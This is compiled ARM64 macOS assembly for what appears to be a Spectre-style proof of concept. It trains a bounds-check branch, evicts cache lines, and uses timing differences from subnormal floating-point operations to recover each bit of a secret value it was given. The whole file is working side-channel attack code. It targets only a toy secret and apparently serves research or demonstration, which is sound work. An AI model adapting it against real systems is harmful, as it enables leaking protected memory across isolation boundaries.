	.section	__TEXT,__text,regular,pure_instructions
	.build_version macos, 14, 0	sdk_version 14, 4
	.globl	_victim_function                ; -- Begin function victim_function
	.p2align	2
_victim_function:                       ; @victim_function
	.cfi_startproc
; %bb.0:
	adrp	x8, _array@PAGE+1024
	ldrb	w8, [x8, _array@PAGEOFF+1024]
	cmp	w8, w2
	b.le	LBB0_2
; %bb.1:
	lsr	w8, w0, w1
	and	w8, w8, #0x1
	mov	x9, #4679240012837945344        ; =0x40f0000000000000
	mul	x9, x8, x9
	eor	w8, w8, #0x1
	mov	x10, #4919                      ; =0x1337
	movk	x10, #48879, lsl #16
	movk	x10, #57005, lsl #32
	movk	x10, #16, lsl #48
	madd	x8, x8, x10, x9
	; InlineAsm Start
	fmov	d0, x8
	; InlineAsm End
	; InlineAsm Start
	fsqrt	d0, d0
	fmul	d0, d0, d0
	fsqrt	d0, d0
	fmul	d0, d0, d0
	fsqrt	d0, d0
	fmul	d0, d0, d0


	; InlineAsm End
	; InlineAsm Start
	fmov	x8, d0
	; InlineAsm End
	; InlineAsm Start
	mov	x8, x8
	; InlineAsm End
Lloh0:
	adrp	x8, _global_variable@PAGE
Lloh1:
	add	x8, x8, _global_variable@PAGEOFF
	; InlineAsm Start
	ldr	x10, [x8]
	; InlineAsm End
LBB0_2:
	ret
	.loh AdrpAdd	Lloh0, Lloh1
	.cfi_endproc
                                        ; -- End function
	.globl	_setup                          ; -- Begin function setup
	.p2align	2
_setup:                                 ; @setup
	.cfi_startproc
; %bb.0:
	stp	x20, x19, [sp, #-32]!           ; 16-byte Folded Spill
	stp	x29, x30, [sp, #16]             ; 16-byte Folded Spill
	add	x29, sp, #16
	.cfi_def_cfa w29, 16
	.cfi_offset w30, -8
	.cfi_offset w29, -16
	.cfi_offset w19, -24
	.cfi_offset w20, -32
Lloh2:
	adrp	x19, _array@PAGE
Lloh3:
	add	x19, x19, _array@PAGEOFF
	mov	x0, x19
	mov	w1, #131072                     ; =0x20000
	bl	_bzero
	mov	w8, #10                         ; =0xa
	strb	w8, [x19, #1024]
	add	x0, x19, #1024
	bl	_cache_remove_prepare
	adrp	x8, _arr_context@PAGE
	str	x0, [x8, _arr_context@PAGEOFF]
Lloh4:
	adrp	x0, _global_variable@PAGE
Lloh5:
	add	x0, x0, _global_variable@PAGEOFF
	bl	_cache_remove_prepare
	adrp	x8, _global_variable_context@PAGE
	str	x0, [x8, _global_variable_context@PAGEOFF]
Lloh6:
	adrp	x0, _secret@PAGE
Lloh7:
	add	x0, x0, _secret@PAGEOFF
	bl	_cache_remove_prepare
	adrp	x8, _secret_context@PAGE
	str	x0, [x8, _secret_context@PAGEOFF]
	ldp	x29, x30, [sp, #16]             ; 16-byte Folded Reload
	ldp	x20, x19, [sp], #32             ; 16-byte Folded Reload
	ret
	.loh AdrpAdd	Lloh6, Lloh7
	.loh AdrpAdd	Lloh4, Lloh5
	.loh AdrpAdd	Lloh2, Lloh3
	.cfi_endproc
                                        ; -- End function
	.globl	_leakValue                      ; -- Begin function leakValue
	.p2align	2
_leakValue:                             ; @leakValue
	.cfi_startproc
; %bb.0:
	stp	x28, x27, [sp, #-96]!           ; 16-byte Folded Spill
	stp	x26, x25, [sp, #16]             ; 16-byte Folded Spill
	stp	x24, x23, [sp, #32]             ; 16-byte Folded Spill
	stp	x22, x21, [sp, #48]             ; 16-byte Folded Spill
	stp	x20, x19, [sp, #64]             ; 16-byte Folded Spill
	stp	x29, x30, [sp, #80]             ; 16-byte Folded Spill
	add	x29, sp, #80
	.cfi_def_cfa w29, 16
	.cfi_offset w30, -8
	.cfi_offset w29, -16
	.cfi_offset w19, -24
	.cfi_offset w20, -32
	.cfi_offset w21, -40
	.cfi_offset w22, -48
	.cfi_offset w23, -56
	.cfi_offset w24, -64
	.cfi_offset w25, -72
	.cfi_offset w26, -80
	.cfi_offset w27, -88
	.cfi_offset w28, -96
	mov	x19, x0
	mov	w20, #301                       ; =0x12d
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	mov	w21, #10                        ; =0xa
	adrp	x22, _arr_context@PAGE
	adrp	x23, _global_variable_context@PAGE
	adrp	x25, _array@PAGE+1024
	mov	x27, #4679240012837945344       ; =0x40f0000000000000
	mov	x28, #4919                      ; =0x1337
	movk	x28, #48879, lsl #16
	movk	x28, #57005, lsl #32
	movk	x28, #16, lsl #48
Lloh8:
	adrp	x24, _global_variable@PAGE
Lloh9:
	add	x24, x24, _global_variable@PAGEOFF
	b	LBB2_2
LBB2_1:                                 ;   in Loop: Header=BB2_2 Depth=1
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	subs	w20, w20, #1
	b.eq	LBB2_4
LBB2_2:                                 ; =>This Inner Loop Header: Depth=1
	cmp	w20, #1
	csel	w26, w21, wzr, eq
	ldr	x0, [x22, _arr_context@PAGEOFF]
	bl	_cache_remove
	ldr	x0, [x23, _global_variable_context@PAGEOFF]
	bl	_cache_remove
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	ldrb	w8, [x25, _array@PAGEOFF+1024]
	cmp	w26, w8
	b.hs	LBB2_1
; %bb.3:                                ;   in Loop: Header=BB2_2 Depth=1
Lloh10:
	adrp	x8, _secret@PAGE
Lloh11:
	ldr	w8, [x8, _secret@PAGEOFF]
	lsr	x8, x8, x19
	and	x8, x8, #0x1
	mul	x9, x8, x27
	eor	w8, w8, #0x1
	madd	x8, x8, x28, x9
	; InlineAsm Start
	fmov	d0, x8
	; InlineAsm End
	; InlineAsm Start
	fsqrt	d0, d0
	fmul	d0, d0, d0
	fsqrt	d0, d0
	fmul	d0, d0, d0
	fsqrt	d0, d0
	fmul	d0, d0, d0


	; InlineAsm End
	; InlineAsm Start
	fmov	x8, d0
	; InlineAsm End
	; InlineAsm Start
	mov	x8, x8
	; InlineAsm End
	; InlineAsm Start
	ldr	x10, [x24]
	; InlineAsm End
	b	LBB2_1
LBB2_4:
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
Lloh12:
	adrp	x8, _timestamp@GOTPAGE
Lloh13:
	ldr	x8, [x8, _timestamp@GOTPAGEOFF]
	ldr	w9, [x8]
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	; InlineAsm Start
	ldr	x10, [x24]
	; InlineAsm End
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	ldr	w8, [x8]
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	sub	w0, w8, w9
	ldp	x29, x30, [sp, #80]             ; 16-byte Folded Reload
	ldp	x20, x19, [sp, #64]             ; 16-byte Folded Reload
	ldp	x22, x21, [sp, #48]             ; 16-byte Folded Reload
	ldp	x24, x23, [sp, #32]             ; 16-byte Folded Reload
	ldp	x26, x25, [sp, #16]             ; 16-byte Folded Reload
	ldp	x28, x27, [sp], #96             ; 16-byte Folded Reload
	ret
	.loh AdrpAdd	Lloh8, Lloh9
	.loh AdrpLdr	Lloh10, Lloh11
	.loh AdrpLdrGot	Lloh12, Lloh13
	.cfi_endproc
                                        ; -- End function
	.globl	_main                           ; -- Begin function main
	.p2align	2
_main:                                  ; @main
	.cfi_startproc
; %bb.0:
	stp	x28, x27, [sp, #-96]!           ; 16-byte Folded Spill
	stp	x26, x25, [sp, #16]             ; 16-byte Folded Spill
	stp	x24, x23, [sp, #32]             ; 16-byte Folded Spill
	stp	x22, x21, [sp, #48]             ; 16-byte Folded Spill
	stp	x20, x19, [sp, #64]             ; 16-byte Folded Spill
	stp	x29, x30, [sp, #80]             ; 16-byte Folded Spill
	add	x29, sp, #80
	sub	sp, sp, #480
	.cfi_def_cfa w29, 16
	.cfi_offset w30, -8
	.cfi_offset w29, -16
	.cfi_offset w19, -24
	.cfi_offset w20, -32
	.cfi_offset w21, -40
	.cfi_offset w22, -48
	.cfi_offset w23, -56
	.cfi_offset w24, -64
	.cfi_offset w25, -72
	.cfi_offset w26, -80
	.cfi_offset w27, -88
	.cfi_offset w28, -96
	mov	x19, x1
	add	x21, sp, #192
Lloh14:
	adrp	x8, ___stack_chk_guard@GOTPAGE
Lloh15:
	ldr	x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
Lloh16:
	ldr	x8, [x8]
	stur	x8, [x29, #-104]
	bl	_timer_start
	ldr	x0, [x19, #8]
	bl	_atoi
Lloh17:
	adrp	x20, _secret@PAGE
Lloh18:
	add	x20, x20, _secret@PAGEOFF
	str	w0, [x20]
	movi.2d	v0, #0000000000000000
	stp	q0, q0, [x21, #224]
	stp	q0, q0, [x21, #192]
	stp	q0, q0, [x21, #160]
	stp	q0, q0, [x21, #128]
	stp	q0, q0, [sp, #288]
	stp	q0, q0, [sp, #256]
	stp	q0, q0, [sp, #224]
	stp	q0, q0, [sp, #192]
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
Lloh19:
	adrp	x19, _array@PAGE
Lloh20:
	add	x19, x19, _array@PAGEOFF
	mov	x0, x19
	mov	w1, #131072                     ; =0x20000
	bl	_bzero
	mov	w21, #10                        ; =0xa
	strb	w21, [x19, #1024]
	add	x0, x19, #1024
	bl	_cache_remove_prepare
	adrp	x22, _arr_context@PAGE
	str	x0, [x22, _arr_context@PAGEOFF]
Lloh21:
	adrp	x0, _global_variable@PAGE
Lloh22:
	add	x0, x0, _global_variable@PAGEOFF
	bl	_cache_remove_prepare
	adrp	x23, _global_variable_context@PAGE
	str	x0, [x23, _global_variable_context@PAGEOFF]
	mov	x0, x20
	bl	_cache_remove_prepare
	adrp	x8, _secret_context@PAGE
	str	x0, [x8, _secret_context@PAGEOFF]
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	str	wzr, [sp, #188]
	ldr	w8, [sp, #188]
	cmp	w8, #31
	b.gt	LBB3_7
; %bb.1:
	adrp	x20, _array@PAGE+1024
	adrp	x24, _secret@PAGE
	mov	x25, #4679240012837945344       ; =0x40f0000000000000
	mov	x26, #4919                      ; =0x1337
	movk	x26, #48879, lsl #16
	movk	x26, #57005, lsl #32
	movk	x26, #16, lsl #48
	b	LBB3_3
LBB3_2:                                 ;   in Loop: Header=BB3_3 Depth=1
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
Lloh23:
	adrp	x11, _timestamp@GOTPAGE
Lloh24:
	ldr	x11, [x11, _timestamp@GOTPAGEOFF]
	ldr	w8, [x11]
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
Lloh25:
	adrp	x9, _global_variable@PAGE
Lloh26:
	add	x9, x9, _global_variable@PAGEOFF
	; InlineAsm Start
	ldr	x10, [x9]
	; InlineAsm End
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	ldr	w9, [x11]
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	sub	w8, w9, w8
	sxtw	x8, w8
	ldrsw	x9, [sp, #188]
	add	x10, sp, #192
	str	x8, [x10, x9, lsl #3]
	ldr	w8, [sp, #188]
	add	w8, w8, #1
	str	w8, [sp, #188]
	ldr	w8, [sp, #188]
	cmp	w8, #32
	b.ge	LBB3_8
LBB3_3:                                 ; =>This Loop Header: Depth=1
                                        ;     Child Loop BB3_5 Depth 2
	ldr	w27, [sp, #188]
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	mov	w28, #301                       ; =0x12d
	b	LBB3_5
LBB3_4:                                 ;   in Loop: Header=BB3_5 Depth=2
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	subs	w28, w28, #1
	b.eq	LBB3_2
LBB3_5:                                 ;   Parent Loop BB3_3 Depth=1
                                        ; =>  This Inner Loop Header: Depth=2
	cmp	w28, #1
	csel	w19, w21, wzr, eq
	ldr	x0, [x22, _arr_context@PAGEOFF]
	bl	_cache_remove
	ldr	x0, [x23, _global_variable_context@PAGEOFF]
	bl	_cache_remove
	; InlineAsm Start
	dmb	sy
	isb
	; InlineAsm End
	ldrb	w8, [x20, _array@PAGEOFF+1024]
	cmp	w19, w8
	b.hs	LBB3_4
; %bb.6:                                ;   in Loop: Header=BB3_5 Depth=2
	ldr	w8, [x24, _secret@PAGEOFF]
	lsr	x8, x8, x27
	and	x8, x8, #0x1
	mul	x9, x8, x25
	eor	w8, w8, #0x1
	madd	x8, x8, x26, x9
	; InlineAsm Start
	fmov	d0, x8
	; InlineAsm End
	; InlineAsm Start
	fsqrt	d0, d0
	fmul	d0, d0, d0
	fsqrt	d0, d0
	fmul	d0, d0, d0
	fsqrt	d0, d0
	fmul	d0, d0, d0


	; InlineAsm End
	; InlineAsm Start
	fmov	x8, d0
	; InlineAsm End
	; InlineAsm Start
	mov	x8, x8
	; InlineAsm End
Lloh27:
	adrp	x8, _global_variable@PAGE
Lloh28:
	add	x8, x8, _global_variable@PAGEOFF
	; InlineAsm Start
	ldr	x10, [x8]
	; InlineAsm End
	b	LBB3_4
LBB3_7:
	stp	xzr, xzr, [sp, #168]            ; 16-byte Folded Spill
	stp	xzr, xzr, [sp, #152]            ; 16-byte Folded Spill
	stp	xzr, xzr, [sp, #136]            ; 16-byte Folded Spill
	stp	xzr, xzr, [sp, #120]            ; 16-byte Folded Spill
	stp	xzr, xzr, [sp, #104]            ; 16-byte Folded Spill
	stp	xzr, xzr, [sp, #88]             ; 16-byte Folded Spill
	stp	xzr, xzr, [sp, #72]             ; 16-byte Folded Spill
	stp	xzr, xzr, [sp, #56]             ; 16-byte Folded Spill
	mov	x27, #0                         ; =0x0
	mov	x25, #0                         ; =0x0
	stp	xzr, xzr, [sp, #40]             ; 16-byte Folded Spill
	stp	xzr, xzr, [sp, #24]             ; 16-byte Folded Spill
	stp	xzr, xzr, [sp, #8]              ; 16-byte Folded Spill
	mov	x26, #0                         ; =0x0
	mov	x28, #0                         ; =0x0
	mov	x20, #0                         ; =0x0
	mov	x21, #0                         ; =0x0
	mov	x22, #0                         ; =0x0
	mov	x23, #0                         ; =0x0
	mov	x24, #0                         ; =0x0
	mov	x8, #0                          ; =0x0
	b	LBB3_9
LBB3_8:
	ldp	x8, x24, [sp, #192]
	ldp	x23, x22, [sp, #208]
	ldp	x21, x20, [sp, #224]
	ldp	x28, x26, [sp, #240]
	ldr	x10, [sp, #256]
	ldr	x9, [sp, #264]
	stp	x10, x9, [sp, #8]               ; 16-byte Folded Spill
	ldr	x10, [sp, #272]
	ldr	x9, [sp, #280]
	stp	x10, x9, [sp, #24]              ; 16-byte Folded Spill
	ldr	x10, [sp, #288]
	ldr	x9, [sp, #296]
	stp	x10, x9, [sp, #40]              ; 16-byte Folded Spill
	add	x10, sp, #192
	ldr	x11, [x10, #128]
	ldr	x9, [x10, #136]
	stp	x11, x9, [sp, #56]              ; 16-byte Folded Spill
	ldr	x11, [x10, #144]
	ldr	x9, [x10, #152]
	stp	x11, x9, [sp, #72]              ; 16-byte Folded Spill
	ldr	x11, [x10, #160]
	ldr	x9, [x10, #168]
	stp	x11, x9, [sp, #88]              ; 16-byte Folded Spill
	ldr	x11, [x10, #176]
	ldr	x9, [x10, #184]
	stp	x11, x9, [sp, #104]             ; 16-byte Folded Spill
	ldr	x11, [x10, #192]
	ldr	x9, [x10, #200]
	stp	x11, x9, [sp, #120]             ; 16-byte Folded Spill
	ldr	x11, [x10, #208]
	ldr	x9, [x10, #216]
	stp	x11, x9, [sp, #136]             ; 16-byte Folded Spill
	ldr	x11, [x10, #224]
	ldr	x9, [x10, #232]
	stp	x11, x9, [sp, #152]             ; 16-byte Folded Spill
	ldr	x11, [x10, #240]
	ldr	x9, [x10, #248]
	stp	x11, x9, [sp, #168]             ; 16-byte Folded Spill
	ldp	x25, x27, [sp, #304]
LBB3_9:
	str	x8, [sp]
Lloh29:
	adrp	x19, l_.str@PAGE
Lloh30:
	add	x19, x19, l_.str@PAGEOFF
	mov	x0, x19
	bl	_printf
	str	x24, [sp]
	mov	x0, x19
	bl	_printf
	str	x23, [sp]
	mov	x0, x19
	bl	_printf
	str	x22, [sp]
	mov	x0, x19
	bl	_printf
	str	x21, [sp]
	mov	x0, x19
	bl	_printf
	str	x20, [sp]
	mov	x0, x19
	bl	_printf
	str	x28, [sp]
	mov	x0, x19
	bl	_printf
	str	x26, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #8]                    ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #16]                   ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #24]                   ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #32]                   ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #40]                   ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #48]                   ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	str	x25, [sp]
	mov	x0, x19
	bl	_printf
	str	x27, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #56]                   ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #64]                   ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #72]                   ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #80]                   ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #88]                   ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #96]                   ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #104]                  ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #112]                  ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #120]                  ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #128]                  ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #136]                  ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #144]                  ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #152]                  ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #160]                  ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #168]                  ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	ldr	x8, [sp, #176]                  ; 8-byte Folded Reload
	str	x8, [sp]
	mov	x0, x19
	bl	_printf
	bl	_timer_stop
	ldur	x8, [x29, #-104]
Lloh31:
	adrp	x9, ___stack_chk_guard@GOTPAGE
Lloh32:
	ldr	x9, [x9, ___stack_chk_guard@GOTPAGEOFF]
Lloh33:
	ldr	x9, [x9]
	cmp	x9, x8
	b.ne	LBB3_11
; %bb.10:
	mov	w0, #0                          ; =0x0
	add	sp, sp, #480
	ldp	x29, x30, [sp, #80]             ; 16-byte Folded Reload
	ldp	x20, x19, [sp, #64]             ; 16-byte Folded Reload
	ldp	x22, x21, [sp, #48]             ; 16-byte Folded Reload
	ldp	x24, x23, [sp, #32]             ; 16-byte Folded Reload
	ldp	x26, x25, [sp, #16]             ; 16-byte Folded Reload
	ldp	x28, x27, [sp], #96             ; 16-byte Folded Reload
	ret
LBB3_11:
	bl	___stack_chk_fail
	.loh AdrpAdd	Lloh21, Lloh22
	.loh AdrpAdd	Lloh19, Lloh20
	.loh AdrpAdd	Lloh17, Lloh18
	.loh AdrpLdrGotLdr	Lloh14, Lloh15, Lloh16
	.loh AdrpAdd	Lloh25, Lloh26
	.loh AdrpLdrGot	Lloh23, Lloh24
	.loh AdrpAdd	Lloh27, Lloh28
	.loh AdrpLdrGotLdr	Lloh31, Lloh32, Lloh33
	.loh AdrpAdd	Lloh29, Lloh30
	.cfi_endproc
                                        ; -- End function
	.section	__DATA,__data
	.globl	_global_variable                ; @global_variable
	.p2align	11, 0x0
_global_variable:
	.quad	3203383023                      ; 0xbeefbeef

	.globl	_secret                         ; @secret
	.p2align	11, 0x0
_secret:
	.long	3735927486                      ; 0xdeadbabe

.zerofill __DATA,__bss,_array,131072,11 ; @array
	.globl	_array_ctx                      ; @array_ctx
.zerofill __DATA,__common,_array_ctx,8,3
	.globl	_arr_context                    ; @arr_context
.zerofill __DATA,__common,_arr_context,8,11
	.globl	_global_variable_context        ; @global_variable_context
.zerofill __DATA,__common,_global_variable_context,8,11
	.globl	_secret_context                 ; @secret_context
.zerofill __DATA,__common,_secret_context,8,11
	.section	__TEXT,__cstring,cstring_literals
l_.str:                                 ; @.str
	.asciz	"%3lld "

	.globl	_training_offset                ; @training_offset
.zerofill __DATA,__common,_training_offset,8,3
.subsections_via_symbols
